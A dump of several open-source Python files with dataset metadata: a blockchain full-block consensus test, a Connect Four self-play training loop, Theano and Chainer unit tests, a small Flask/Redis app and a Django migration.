self.save_spendable_output()
b81 = self.next_block(81, spend=out[26])
self.sync_blocks([b81], False, force_send=True) # other chain is same length
self.save_spendable_output()
b82 = self.next_block(82, spend=out[27])
self.sync_blocks([b82], True) # now this chain is longer, triggers re-org
self.save_spendable_output()
# now check that tx78 and tx79 have been put back into the peer's mempool
mempool = self.nodes[0].getrawmempool()
assert_equal(len(mempool), 2)
assert(tx78.hash in mempool)
assert(tx79.hash in mempool)
# Test invalid opcodes in dead execution paths.
#
# -> b81 (26) -> b82 (27) -> b83 (28)
#
self.log.info("Accept a block with invalid opcodes in dead execution paths")
b83 = self.next_block(83)
op_codes = [OP_IF, OP_INVALIDOPCODE, OP_ELSE, OP_TRUE, OP_ENDIF]
script = CScript(op_codes)
tx1 = self.create_and_sign_transaction(out[28], out[28].vout[0].nValue, script)
tx2 = self.create_and_sign_transaction(tx1, 0, CScript([OP_TRUE]))
tx2.vin[0].scriptSig = CScript([OP_FALSE])
tx2.rehash()
b83 = self.update_block(83, [tx1, tx2])
self.sync_blocks([b83], True)
self.save_spendable_output()
# Reorg on/off blocks that have OP_RETURN in them (and try to spend them)
#
# -> b81 (26) -> b82 (27) -> b83 (28) -> b84 (29) -> b87 (30) -> b88 (31)
# \-> b85 (29) -> b86 (30) \-> b89a (32)
#
self.log.info("Test re-orging blocks with OP_RETURN in them")
b84 = self.next_block(84)
tx1 = self.create_tx(out[29], 0, 0, CScript([OP_RETURN]))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx1.calc_sha256()
self.sign_tx(tx1, out[29])
tx1.rehash()
tx2 = self.create_tx(tx1, 1, 0, CScript([OP_RETURN]))
tx2.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx3 = self.create_tx(tx1, 2, 0, CScript([OP_RETURN]))
tx3.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx4 = self.create_tx(tx1, 3, 0, CScript([OP_TRUE]))
tx4.vout.append(CTxOut(0, CScript([OP_RETURN])))
tx5 = self.create_tx(tx1, 4, 0, CScript([OP_RETURN]))
b84 = self.update_block(84, [tx1, tx2, tx3, tx4, tx5])
self.sync_blocks([b84], True)
self.save_spendable_output()
self.move_tip(83)
b85 = self.next_block(85, spend=out[29])
self.sync_blocks([b85], False) # other chain is same length
b86 = self.next_block(86, spend=out[30])
self.sync_blocks([b86], True)
self.move_tip(84)
b87 = self.next_block(87, spend=out[30])
self.sync_blocks([b87], False) # other chain is same length
self.save_spendable_output()
b88 = self.next_block(88, spend=out[31])
self.sync_blocks([b88], True)
self.save_spendable_output()
# trying to spend the OP_RETURN output is rejected
b89a = self.next_block("89a", spend=out[32])
tx = self.create_tx(tx1, 0, 0, CScript([OP_TRUE]))
b89a = self.update_block("89a", [tx])
self.sync_blocks([b89a], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
self.log.info("Test a re-org of one week's worth of blocks (1088 blocks)")
self.move_tip(88)
LARGE_REORG_SIZE = 10
blocks = []
spend = out[32]
for i in range(89, LARGE_REORG_SIZE + 89):
b = self.next_block(i, spend, version=4)
tx = CTransaction()
script_length = 1000000 - len(b.serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b.vtx[1].sha256, 0)))
b = self.update_block(i, [tx])
assert_equal(len(b.serialize()), 1000000)
blocks.append(b)
self.save_spendable_output()
spend = self.get_spendable_output()
self.sync_blocks(blocks, True, timeout=480)
chain1_tip = i
# now create alt chain of same length
self.move_tip(88)
blocks2 = []
for i in range(89, LARGE_REORG_SIZE + 89):
blocks2.append(self.next_block("alt" + str(i), version=4))
self.sync_blocks(blocks2, False, force_send=True)
# extend alt chain to trigger re-org
block = self.next_block("alt" + str(chain1_tip + 1), version=4)
self.sync_blocks([block], True, timeout=480)
# ... and re-org back to the first chain
self.move_tip(chain1_tip)
block = self.next_block(chain1_tip + 1, version=4)
self.sync_blocks([block], False, force_send=True)
block = self.next_block(chain1_tip + 2, version=4)
self.sync_blocks([block], True, timeout=480)
time.sleep(1)
self.log.info("Reject a block with an invalid block header version")
b_v1 = self.next_block('b_v1', version=1)
self.sync_blocks([b_v1], success=False, force_send=True, reject_reason='bad-version(0x00000001)')
self.move_tip(chain1_tip + 2)
b_cb34 = self.next_block('b_cb34', version=4)
b_cb34.vtx[0].vin[0].scriptSig = b_cb34.vtx[0].vin[0].scriptSig[:-1]
b_cb34.vtx[0].rehash()
b_cb34.hashMerkleRoot = b_cb34.calc_merkle_root()
b_cb34.solve()
self.sync_blocks([b_cb34], success=False, reject_reason='block height mismatch in coinbase', force_send=True)
# Helper methods
################force_send
def add_transactions_to_block(self, block, tx_list):
[tx.rehash() for tx in tx_list]
block.vtx.extend(tx_list)
# this is a little handier to use than the version in blocktools.py
def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])):
return create_tx_with_script(spend_tx, n, amount=value, script_pub_key=script)
# sign a transaction, using the key we know about
# this signs input 0 in tx, which is assumed to be spending output n in spend_tx
def sign_tx(self, tx, spend_tx):
scriptPubKey = bytearray(spend_tx.vout[0].scriptPubKey)
if (scriptPubKey[0] == OP_TRUE): # an anyone-can-spend
tx.vin[0].scriptSig = CScript()
return
(sighash, err) = SignatureHash(spend_tx.vout[0].scriptPubKey, tx, 0, SIGHASH_ALL)
tx.vin[0].scriptSig = CScript([self.coinbase_key.sign_ecdsa(sighash) + bytes(bytearray([SIGHASH_ALL]))])
def create_and_sign_transaction(self, spend_tx, value, script=CScript([OP_TRUE])):
tx = self.create_tx(spend_tx, 0, value, script)
self.sign_tx(tx, spend_tx)
tx.rehash()
return tx
def next_block(self, number, spend=None, additional_coinbase_value=0, script=CScript([OP_TRUE]), solve=True, *, version=4):
if self.tip is None:
base_block_hash = self.genesis_hash
block_time = int(time.time()) + 1
else:
base_block_hash = self.tip.sha256
block_time = self.tip.nTime + 1
# First create the coinbase
height = self.block_heights[base_block_hash] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
coinbase.vout[0].nValue += additional_coinbase_value
coinbase.rehash()
if spend is None:
block = create_block(base_block_hash, coinbase, block_time, version=version)
else:
coinbase.vout[0].nValue += spend.vout[0].nValue - 1 # all but one satoshi to fees
coinbase.rehash()
block = create_block(base_block_hash, coinbase, block_time, version=version)
tx = self.create_tx(spend, 0, 1, script) # spend 1 satoshi
self.sign_tx(tx, spend)
self.add_transactions_to_block(block, [tx])
block.hashMerkleRoot = block.calc_merkle_root()
if solve:
block.solve()
self.tip = block
self.block_heights[block.sha256] = height
assert number not in self.blocks
self.blocks[number] = block
return block
# save the current tip so it can be spent by a later block
def save_spendable_output(self):
self.log.debug("saving spendable output %s" % self.tip.vtx[0])
self.spendable_outputs.append(self.tip)
# get an output that we previously marked as spendable
def get_spendable_output(self):
self.log.debug("getting spendable output %s" % self.spendable_outputs[0].vtx[0])
return self.spendable_outputs.pop(0).vtx[0]
# move the tip back to a previous block
def move_tip(self, number):
self.tip = self.blocks[number]
# adds transactions to the block and updates state
def update_block(self, block_number, new_transactions):
block = self.blocks[block_number]
self.add_transactions_to_block(block, new_transactions)
old_sha256 = block.sha256
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
# Update the internal state just like in next_block
self.tip = block
if block.sha256 != old_sha256:
self.block_heights[block.sha256] = self.block_heights[old_sha256]
del self.block_heights[old_sha256]
self.blocks[block_number] = block
return block
def bootstrap_p2p(self, timeout=10):
"""Add a P2P connection to the node.
Helper to connect and wait for version handshake."""
self.nodes[0].add_p2p_connection(P2PDataStore())
# We need to wait for the initial getheaders from the peer before we
# start populating our blockstore. If we don't, then we may run ahead
# to the next subtest before we receive the getheaders. We'd then send
# an INV for the next block and receive two getheaders - one for the
# IBD and one for the INV. We'd respond to both and could get
# unexpectedly disconnected if the DoS score for that error is 50.
self.nodes[0].p2p.wait_for_getheaders(timeout=timeout)
def reconnect_p2p(self, timeout=60):
"""Tear down and bootstrap the P2P connection to the node.
The node gets disconnected several times in this test. This helper
method reconnects the p2p and restarts the network thread."""
self.nodes[0].disconnect_p2ps()
self.bootstrap_p2p(timeout=timeout)
def sync_blocks(self, blocks, success=True, reject_reason=None, force_send=False, reconnect=False, timeout=60):
"""Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.
Call with success = False if the tip shouldn't advance to the most recent block."""
self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_reason=reject_reason, force_send=force_send, timeout=timeout, expect_disconnect=reconnect)
if reconnect:
self.reconnect_p2p(timeout=timeout)
if __name__ == '__main__':
FullBlockTest().main()
| 46.509804 | 184 | 0.584598 |
75c36dda4c76a28b49d5c811c321b54af326ede4 | 2,795 | py | Python | connectfour/agent/environment.py | Lando-L/connect-four | 35be8b41443bd357b2b30678237a4581f3543aac | [
"MIT"
] | null | null | null | connectfour/agent/environment.py | Lando-L/connect-four | 35be8b41443bd357b2b30678237a4581f3543aac | [
"MIT"
] | null | null | null | connectfour/agent/environment.py | Lando-L/connect-four | 35be8b41443bd357b2b30678237a4581f3543aac | [
"MIT"
] | null | null | null | import os
from typing import Tuple
import numpy as np
from connectfour.agent.memory import AgentMemory
from connectfour.agent.model import AgentModel
from connectfour.game import gamestate
from connectfour.tools.mcts.tree import MCTSTree
class AgentEnvironment:
def __init__(self, observation_space: Tuple, action_space: int, value_space: int) -> None:
self.action_space = action_space
self.observation_space = observation_space
self.value_space = value_space
self.memory = AgentMemory()
self.model = AgentModel(observation_space, action_space, value_space)
self.tree = MCTSTree(gamestate.step, gamestate.valid_actions, self.model.evaluate)
self.histories = []
def evaluate(self, num_simulations: int, exploration_constant: float, temperature: float) -> None:
state = gamestate.empty()
episode = []
outcome = None
while outcome is None:
self.tree.reset(state)
probabilities = self.tree.simulate(num_simulations, exploration_constant, temperature, state.player)
actions = np.array([probabilities.get(i, 0) for i in range(self.action_space)])
action = np.random.choice(np.arange(self.action_space), p=actions)
episode.append((state, actions))
state, outcome = gamestate.step(state, action)
for state, action in episode:
self.memory.store((state, action, outcome))
self.memory.store((
gamestate.GameState(
board=np.fliplr(state.board),
depths=state.depths,
player=state.player
), action, outcome
))
def improve(self, num_samples: int, batch_size: int, epochs: int) -> None:
states, actions, outcomes = self.memory.sample(num_samples)
history = self.model.train(states, actions, outcomes, batch_size, epochs)
self.histories.append(history)
def iterate(self,
num_iterations: int,
checkpoint: int,
path: str,
num_simulations: int,
exploration_constant: float,
temperature: float,
samples: int,
batch_size: int,
epochs: int) -> None:
for i in range(1, num_iterations + 1):
self.evaluate(num_simulations, exploration_constant, temperature)
self.improve(samples, batch_size, epochs)
if i % checkpoint == 0:
print(f'Saving model at checkpoint {i}')
self.model.save(os.path.join(path, f'checkpoint_{i}_model.h5'))
self.model.save(os.path.join(path, 'model.h5'))
self.memory.save(os.path.join(path, 'memory.pickle'))
| 36.298701 | 112 | 0.620036 |
1d56ac8bd6e9f69dda6177d90df70ed873910b3f | 6,263 | py | Python | Theano-master/theano/gof/tests/test_link.py | JuliusSchwartz/FlowMO | e221d989914f906501e1ad19cd3629d88eac1785 | [
"MIT"
] | 95 | 2019-05-14T20:55:26.000Z | 2022-03-26T13:32:42.000Z | Theano-master/theano/gof/tests/test_link.py | JuliusSchwartz/FlowMO | e221d989914f906501e1ad19cd3629d88eac1785 | [
"MIT"
] | 7 | 2019-11-25T08:24:47.000Z | 2021-09-12T13:29:14.000Z | Theano-master/theano/gof/tests/test_link.py | JuliusSchwartz/FlowMO | e221d989914f906501e1ad19cd3629d88eac1785 | [
"MIT"
] | 24 | 2019-05-14T20:55:38.000Z | 2022-01-16T11:29:39.000Z | from __future__ import absolute_import, print_function, division
from copy import deepcopy
import unittest
import numpy
import theano
from theano.gof import graph
from theano.gof.graph import Variable, Apply, Constant
from theano.gof.type import Type
from theano.gof.op import Op
from theano.gof import fg
from theano.gof.link import * # noqa
from theano.compat import cmp
def as_variable(x):
assert isinstance(x, Variable)
return x
class TDouble(Type):
def filter(self, data):
return float(data)
tdouble = TDouble()
def double(name):
return Variable(tdouble, None, None, name=name)
class MyOp(Op):
__props__ = ("nin", "name", "impl")
def __init__(self, nin, name, impl=None):
self.nin = nin
self.name = name
if impl:
self.impl = impl
def make_node(self, *inputs):
assert len(inputs) == self.nin
inputs = [as_variable(i) for i in inputs]
for input in inputs:
if input.type is not tdouble:
raise Exception("Error 1")
outputs = [double(self.name + "_R")]
return Apply(self, inputs, outputs)
def __str__(self):
return self.name
def perform(self, node, inputs, out_):
out, = out_
out[0] = self.impl(*inputs)
add = MyOp(2, 'Add', lambda x, y: x + y)
sub = MyOp(2, 'Sub', lambda x, y: x - y)
mul = MyOp(2, 'Mul', lambda x, y: x * y)
div = MyOp(2, 'Div', lambda x, y: x / y)
def notimpl(self, x):
raise NotImplementedError()
raise_err = MyOp(1, 'RaiseErr', notimpl)
def inputs():
x = double('x')
y = double('y')
z = double('z')
return x, y, z
def perform_linker(fgraph):
lnk = PerformLinker().accept(fgraph)
return lnk
def FunctionGraph(inputs, outputs):
e = fg.FunctionGraph(inputs, outputs)
return e
class TestPerformLinker(unittest.TestCase):
def test_thunk(self):
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn, i, o = perform_linker(FunctionGraph([x, y, z], [e])).make_thunk()
i[0].data = 1
i[1].data = 2
fn()
assert o[0].data == 1.5
def test_function(self):
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn = perform_linker(FunctionGraph([x, y, z], [e])).make_function()
assert fn(1.0, 2.0, 3.0) == 1.5
def test_constant(self):
x, y, z = inputs()
y = Constant(tdouble, 2.0)
e = mul(add(x, y), div(x, y))
fn = perform_linker(FunctionGraph([x], [e])).make_function()
assert fn(1.0) == 1.5
def test_input_output_same(self):
x, y, z = inputs()
fn = perform_linker(FunctionGraph([x], [x])).make_function()
assert 1.0 is fn(1.0)
def test_input_dependency0(self):
x, y, z = inputs()
a, d = add(x, y), div(x, y)
e = mul(a, d)
fn = perform_linker(FunctionGraph(*graph.clone([x, y, a],
[e]))).make_function()
assert fn(1.0, 2.0, 9.0) == 4.5
def test_skiphole(self):
x, y, z = inputs()
a = add(x, y)
r = raise_err(a)
e = add(r, a)
fn = perform_linker(FunctionGraph(*graph.clone([x, y, r],
[e]))).make_function()
assert fn(1.0, 2.0, 4.5) == 7.5
def wrap_linker(fgraph, linkers, wrapper):
lnk = WrapLinker(linkers, wrapper).accept(fgraph)
return lnk
class TestWrapLinker(unittest.TestCase):
def test_0(self):
nodes = []
def wrap(i, node, th):
nodes.append(node.op)
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn, i, o = wrap_linker(
FunctionGraph([x, y, z], [e]),
[PerformLinker(allow_gc=False)], wrap).make_thunk()
i[0].data = 1
i[1].data = 2
fn()
assert nodes == [div, add, mul]
assert o[0].data is None
def test_1(self):
nodes = []
def wrap(i, node, th):
nodes.append(node.op)
th()
x, y, z = inputs()
e = mul(add(x, y), div(x, y))
fn, i, o = wrap_linker(
FunctionGraph([x, y, z], [e]),
[PerformLinker(allow_gc=False)], wrap).make_thunk()
i[0].data = 1
i[1].data = 2
fn()
assert nodes == [div, add, mul]
assert o[0].data == 1.5
def test_sort_schedule_fn():
import theano
from theano.gof.sched import sort_schedule_fn, make_depends
x = theano.tensor.matrix('x')
y = theano.tensor.dot(x[:5] * 2, x.T + 1).T
def str_cmp(a, b):
return cmp(str(a), str(b)) # lexicographical sort
linker = theano.OpWiseCLinker(schedule=sort_schedule_fn(str_cmp))
mode = theano.Mode(linker=linker)
f = theano.function((x,), (y,), mode=mode)
nodes = f.maker.linker.make_all()[-1]
depends = make_depends()
for a, b in zip(nodes[:-1], nodes[1:]):
if not depends((b, a)):
assert str(a) < str(b)
def test_container_deepcopy():
"""
This is a test to a work around a NumPy bug.
"""
t = theano.tensor.scalar()
# It seam that numpy.asarray(0.).astype(floatX) can return a numpy
# scalar with some NumPy Version. So we call numpy.asarray with
# the dtype parameter.
v = numpy.asarray(0., dtype=theano.config.floatX)
assert isinstance(v, numpy.ndarray), type(v)
for readonly in [True, False]:
c = Container(t, [v], readonly=readonly)
assert isinstance(c.storage[0], numpy.ndarray), (c.storage[0],
type(c.storage[0]))
assert c.storage[0].dtype == v.dtype, (c.storage[0].dtype, v.dtype)
assert c.storage[0].dtype == c.type.dtype, (c.storage[0].dtype,
c.type.dtype)
d = deepcopy(c)
assert isinstance(d.storage[0], numpy.ndarray), (d.storage[0],
type(d.storage[0]))
assert d.storage[0].dtype == v.dtype, (d.storage[0].dtype, v.dtype)
assert d.storage[0].dtype == c.type.dtype, (d.storage[0].dtype,
c.type.dtype)
| 28.339367 | 77 | 0.544627 |
5266fcbf47370baaeecc1ec0dcc6ca77236cec94 | 10,781 | py | Python | tests/chainer_tests/optimizers_tests/test_optimizers.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 3,705 | 2017-06-01T07:36:12.000Z | 2022-03-30T10:46:15.000Z | tests/chainer_tests/optimizers_tests/test_optimizers.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 5,998 | 2017-06-01T06:40:17.000Z | 2022-03-08T01:42:44.000Z | tests/chainer_tests/optimizers_tests/test_optimizers.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 1,150 | 2017-06-02T03:39:46.000Z | 2022-03-29T02:29:32.000Z | import pickle
import unittest
import numpy as np
import six
import chainer
from chainer import functions as F
from chainer import optimizers
from chainer import testing
_all_optimizers = [
'AdaDelta',
'AdaGrad',
'Adam',
'AdamW',
'AMSGrad',
'AdaBound',
'AMSBound',
'CorrectedMomentumSGD',
'MomentumSGD',
'MSVAG',
'NesterovAG',
'RMSprop',
'RMSpropGraves',
'SGD',
'SMORMS3',
]
_parameterize_optimizers = testing.parameterize(*testing.product({
'optimizer_impl': [getattr(chainer.optimizers, o) for o in _all_optimizers]
}))
class SimpleChain(chainer.Chain):
def __init__(self, shape=()):
super(SimpleChain, self).__init__()
w_np = np.asarray(np.random.randn(*shape)).astype(np.float32)
with self.init_scope():
self.w = chainer.Parameter(w_np, name='w')
def __call__(self, x):
return F.sum((x - self.w) ** 2)
class TestAllOptimizersCoverage(unittest.TestCase):
# Checks _all_optimizers covers all the built-in optimizers.
def test_all_optimizers_coverage(self):
module = chainer.optimizers
module_optimizers = []
for name in dir(module):
obj = getattr(module, name)
if (isinstance(obj, type) and issubclass(obj, chainer.Optimizer)):
module_optimizers.append(name)
assert sorted(_all_optimizers) == sorted(module_optimizers)
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# Intel
{'use_ideep': True},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
{'use_cuda': True, 'cuda_device': 1},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
]
)
@testing.parameterize(*(
# Optimizers constructed with default arguments
[
{
'optimizer': o,
'kwargs': {}
}
for o in _all_optimizers]
# https://chainer/chainer/issues/7424
+ [
{
'optimizer': 'Adam',
'kwargs': {'weight_decay_rate': 0.5},
}]
))
@testing.parameterize(*testing.product(
{'shape': [(2, 3), (), (1, 0, 2)]}
))
class TestOptimizer(unittest.TestCase):
def test_optimizer(self, backend_config):
device = backend_config.device
target = SimpleChain(self.shape)
target.to_device(device)
optimizer_cls = getattr(chainer.optimizers, self.optimizer)
optimizer = optimizer_cls(**self.kwargs)
optimizer.setup(target)
x_np = np.asarray(np.random.randn(*self.shape)).astype(np.float32)
x = chainer.Variable(device.send(x_np))
# Just ensures no error occurs. No numerical check is performed.
optimizer.update(target, x)
@_parameterize_optimizers
class TestOptimizerHyperparameter(unittest.TestCase):
def setUp(self):
self.target = chainer.Link()
with self.target.init_scope():
self.target.w = chainer.Parameter()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def get_hyperparam(self, name):
return getattr(self.target.w.update_rule.hyperparam, name)
def test_hyperparams(self):
# TODO(niboshi): The following optimizers do not pass this test
# because their __init__ do not accept some hyperparameters.
# The test should be fixed.
if self.optimizer_impl in (
chainer.optimizers.AdamW,
chainer.optimizers.AMSGrad,
chainer.optimizers.AdaBound,
chainer.optimizers.AMSBound,
):
raise unittest.SkipTest(
'The optimizer is incompatible with this test')
self.create()
default = self.optimizer.hyperparam.get_dict()
for name, default_value in six.iteritems(default):
self.create()
self.assertEqual(self.get_hyperparam(name), default_value)
new_value = default_value + 0.1
self.create(**{name: new_value})
self.assertEqual(self.get_hyperparam(name), new_value)
class WeightSaveHook(object):
name = 'WeightSaveHook'
call_for_each_param = True
def __init__(self):
self.value = None
def __call__(self, rule, param):
p, g = param.data, param.grad
if p is None or g is None:
return
self.value = np.copy(p)
@_parameterize_optimizers
class TestOptimizerHooks(unittest.TestCase):
def setUp(self):
self.target = SimpleChain()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def get_hyperparam(self, name):
return getattr(self.target.w.update_rule.hyperparam, name)
def test_hooks(self):
w_pre = np.copy(self.target.w.data)
h_pre = WeightSaveHook()
h_post = WeightSaveHook()
self.create()
self.optimizer.add_hook(h_pre, timing='pre')
self.optimizer.add_hook(h_post, name='WeightSaveHookPost',
timing='post')
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
self.assertEqual(w_pre, h_pre.value)
self.assertEqual(w_post, h_post.value)
self.assertNotEqual(h_pre.value, h_post.value)
def test_hooks_auto(self):
w_pre = np.copy(self.target.w.data)
h_pre = WeightSaveHook()
h_pre.timing = 'pre'
h_post = WeightSaveHook()
h_post.timing = 'post'
self.create()
self.optimizer.add_hook(h_pre, timing='auto')
self.optimizer.add_hook(h_post, name='WeightSaveHookPost',
timing='auto')
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
self.assertEqual(w_pre, h_pre.value)
self.assertEqual(w_post, h_post.value)
self.assertNotEqual(h_pre.value, h_post.value)
@_parameterize_optimizers
class TestOptimizerPickable(unittest.TestCase):
def setUp(self):
self.target = SimpleChain()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def get_hyperparam(self, name):
return getattr(self.target.w.update_rule.hyperparam, name)
def test_new_pickle(self):
self.create()
pickled_opt = pickle.dumps(self.optimizer)
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
# Pickle has saved a copy of the target
opt = pickle.loads(pickled_opt)
opt.update(opt.target, x)
pickled_w_post = np.copy(opt.target.w.data)
self.assertEqual(w_post, pickled_w_post)
def test_updated_pickle(self):
self.create()
x = chainer.Variable(np.array(5., dtype=np.float32))
self.optimizer.update(self.target, x)
pickled_opt = pickle.dumps(self.optimizer)
self.optimizer.update(self.target, x)
w_post = np.copy(self.target.w.data)
# Pickle has saved a copy of the target
opt = pickle.loads(pickled_opt)
opt.update(opt.target, x)
pickled_w_post = np.copy(opt.target.w.data)
self.assertEqual(w_post, pickled_w_post)
@_parameterize_optimizers
class TestOptimizerLossScaling(unittest.TestCase):
def setUp(self):
self.target = SimpleChain()
def create(self, *args, **kwargs):
self.optimizer = self.optimizer_impl(*args, **kwargs)
self.optimizer.setup(self.target)
def test_invalid_configs(self):
self.create()
with self.assertRaises(ValueError):
self.optimizer.loss_scaling(interval=0)
with self.assertRaises(ValueError):
self.optimizer.loss_scaling(scale=-1)
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# Intel
{'use_ideep': True},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
]
)
class TestAdamW(unittest.TestCase):
def test_adam_w(self, backend_config):
xp = backend_config.xp
device = backend_config.device
link = chainer.Link(x=(1,))
link.to_device(device)
opt = optimizers.Adam(eta=0.5, weight_decay_rate=0.1)
opt.setup(link)
link.x.data.fill(1)
link.x.grad = device.send(xp.ones_like(link.x.data))
opt.update()
# compare against the value computed with v5 impl
testing.assert_allclose(link.x.data, np.array([0.9495]),
atol=1e-7, rtol=1e-7)
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# Intel
{'use_ideep': True},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
]
)
class TestAMSGrad(unittest.TestCase):
def test_amsgrad(self, backend_config):
device = backend_config.device
link = chainer.Link(x=(4,))
x = link.x
x.data.fill(0)
link.to_device(device)
opt = optimizers.Adam(alpha=0.01, beta2=0.7, amsgrad=True)
opt.setup(link)
x.grad = device.send(np.array([1, -1, 10, -10], np.float32))
opt.update()
testing.assert_allclose(
x.update_rule.state['v'],
[0.3, 0.3, 30, 30],
atol=1e-7, rtol=1e-7)
testing.assert_allclose(
x.data,
[-0.01, 0.01, -0.01, 0.01],
atol=1e-7, rtol=1e-7)
x.grad = device.send(np.array([-10, -10, -1, -1], np.float32))
opt.update()
testing.assert_allclose(
x.update_rule.state['v'],
[30.21, 30.21, 21.3, 21.3],
atol=1e-7, rtol=1e-7)
testing.assert_allclose(
x.update_rule.state['vhat'],
[30.21, 30.21, 30, 30],
atol=1e-7, rtol=1e-7)
testing.assert_allclose(
x.data,
# result with NumPy
[-0.00377703, 0.01745388, -0.01548985, 0.01686232],
atol=1e-7, rtol=1e-7)
testing.run_module(__name__, __file__)
| 29.137838 | 79 | 0.604675 |
a0d7c0c916f3ac9a4f2360f45a9979f8d9772f52 | 873 | py | Python | martin.carrasco/Tarea3/server.py | Nadnus/Dev-Plats | e90bc4770b9c0b7898a19168f6310275e7aa6eab | [
"MIT"
] | null | null | null | martin.carrasco/Tarea3/server.py | Nadnus/Dev-Plats | e90bc4770b9c0b7898a19168f6310275e7aa6eab | [
"MIT"
] | null | null | null | martin.carrasco/Tarea3/server.py | Nadnus/Dev-Plats | e90bc4770b9c0b7898a19168f6310275e7aa6eab | [
"MIT"
] | null | null | null | from functools import wraps
from flask import Flask, render_template, session, request, redirect, url_for
import redis
import os
app = Flask(__name__)
#redis_i = redis.from_url("redis://localhost:6379")
redis_i = redis.StrictRedis(host='localhost', port=6379, db=0)
app.secret_key = os.urandom(24)
def check_redis(f):
@wraps(f)
def decorated_fun(*args, **kwargs):
id = kwargs["id"]
if id not in session and id in redis_i.lrange("user_list", 0, -1):
redis_i.lrem("user_list", 0, id)
@app.route("/<id>")
@check_redis
def index(id):
if 'user' not in session:
session['user'] = id
redis_i.lpush("user_list", id)
return "Logged!"
@app.route("/users")
def users():
l = b",".join(list(redis_i.lrange("user_list", 0, -1)))
return l
if __name__ == "__main__":
app.run()
redis_i.set("user_list", [])
| 24.25 | 77 | 0.642612 |
cb6529afd094479a69475c8939f6264cffea5aed | 315 | py | Python | src/web/models.py | canl/algo-trading | 288f43a54d6594f79c79dc21f5534ad9aa785b29 | [
"MIT"
] | 11 | 2020-04-04T08:59:37.000Z | 2020-12-25T20:21:05.000Z | src/web/models.py | canl/algo-trading | 288f43a54d6594f79c79dc21f5534ad9aa785b29 | [
"MIT"
] | 1 | 2021-12-13T20:35:20.000Z | 2021-12-13T20:35:20.000Z | src/web/models.py | canl/algo-trading | 288f43a54d6594f79c79dc21f5534ad9aa785b29 | [
"MIT"
] | 3 | 2020-06-21T16:29:56.000Z | 2020-07-18T15:15:01.000Z | from flask_login import UserMixin
from src.web import db
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True) # primary keys are required by SQLAlchemy
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100))
name = db.Column(db.String(1000))
| 28.636364 | 91 | 0.71746 |
3ef8bdeab62535a82ee775bed63e566846b51edd | 480 | py | Python | medusa_website/org_chart/migrations/0006_alter_committeerole_email.py | DeakinMeDUSA/medusa_website | 2f865a34ca29b42f4376623659f0e5b3a457769d | [
"MIT"
] | null | null | null | medusa_website/org_chart/migrations/0006_alter_committeerole_email.py | DeakinMeDUSA/medusa_website | 2f865a34ca29b42f4376623659f0e5b3a457769d | [
"MIT"
] | null | null | null | medusa_website/org_chart/migrations/0006_alter_committeerole_email.py | DeakinMeDUSA/medusa_website | 2f865a34ca29b42f4376623659f0e5b3a457769d | [
"MIT"
] | null | null | null | # Generated by Django 3.2.10 on 2022-01-03 08:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('org_chart', '0005_committeememberrecord'),
]
operations = [
migrations.AlterField(
model_name='committeerole',
name='email',
field=models.EmailField(help_text='Must not be the personal email of the position holder', max_length=254, unique=True),
),
]
| 25.263158 | 132 | 0.641667 |
79fb6fce030cb7f946bca21bfd1d13c5b7400a15 | 9,069 | py | Python | train.py | bklppr/yolo2_onnx | fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4 | [
"MIT"
] | null | null | null | train.py | bklppr/yolo2_onnx | fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4 | [
"MIT"
] | null | null | null | train.py | bklppr/yolo2_onnx | fcb85bd94e22c1c47f20fc13bb6ae3ac1ccd10f4 | [
"MIT"
] | 1 | 2018-07-11T22:44:11.000Z | 2018-07-11T22:44:11.000Z | from __future__ import print_function
import sys
